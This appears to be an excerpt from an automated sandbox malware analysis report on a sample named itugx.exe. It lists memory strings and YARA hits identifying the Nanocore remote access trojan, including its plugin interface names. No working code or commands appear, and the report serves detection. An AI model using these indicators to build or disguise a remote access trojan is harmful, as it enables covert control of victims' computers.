Source: itugx.exe, 00000002.00000000.358747295.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: itugx.exe	Binary or memory string: WIN_XPe
Source: itugx.exe	Binary or memory string: WIN_VISTA
Source: itugx.exe	Binary or memory string: WIN_7
Source: itugx.exe	Binary or memory string: WIN_8

Remote Access Functionality

Detected Nanocore Rat

Source: itugx.exe, 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: itugx.exe, 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Source: Yara match	File source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
